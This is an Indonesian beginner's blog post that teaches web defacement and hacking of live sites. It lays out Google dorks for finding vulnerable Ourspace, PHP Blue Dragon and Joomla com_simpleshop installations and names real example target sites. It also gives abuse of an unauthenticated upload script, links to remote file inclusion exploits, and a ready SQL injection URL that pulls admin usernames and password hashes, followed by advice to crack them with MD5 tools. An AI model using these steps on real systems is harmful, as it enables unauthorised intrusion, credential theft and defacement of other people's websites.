Teknik Hacking Newbiie

[ Kumpulan Tutorial Hacking Web ]

Level : Pemula

Hacking pada Ourspace 2.0.9
---------------------------
Awalnya buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. http://www.milw0rm.com/exploits/4343

Code :
1. Buka google, trus ketik inurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di hack
contohnya : http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul kalimat upload files
5. Isi deh atau upload file html anda.

Hacking Remote File Inclusion
-----------------------------
Demikian sedikit dari teknik hacking RFI.

Code :
1. Buka google trus ketik "Php Blue Dragon" pada search enginenya
2. Setelah itu cari situs yang mau di hack
Contohnya : http://www.komix91.ovh.org
Cari aja Bug nya di http://www.milw0rm.com
Klik search trus ketik PHP BLUE DRAGON. Ini hasil dari serach pada milw0rm.
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
3. Selanjutnya silakan dicoba.

Hacking SQL Injection
---------------------
Demikian merupakan salah satu dari teknik hacking SQL injection.
Bug SQL http://www.milw0rm.com/exploits/5177

Code:
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. Singkat penjelasan kalau kita telah mendapatnya sekarang kita inject.
Contoh : http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Dan seandainya ada hasilnya , lalu silakan deskripsi password adminnya menggunakan tools MD5 crack, kalau belum ada silakan download di google.
Itu kalo ada hasiLnya tapi kalo tidak ada ya nasib deh cari lagi yang lain. ^_^
4. Selamat Mencoba. Semoga sukses

Demikian duLu..
Semua itu untuk newbie yang ingin beLajar deface dan hacking. ^_^

Special tHank`s to : Manadocoding

Labels:

0 comments:

Post a Comment

My ProfiLe on Facebook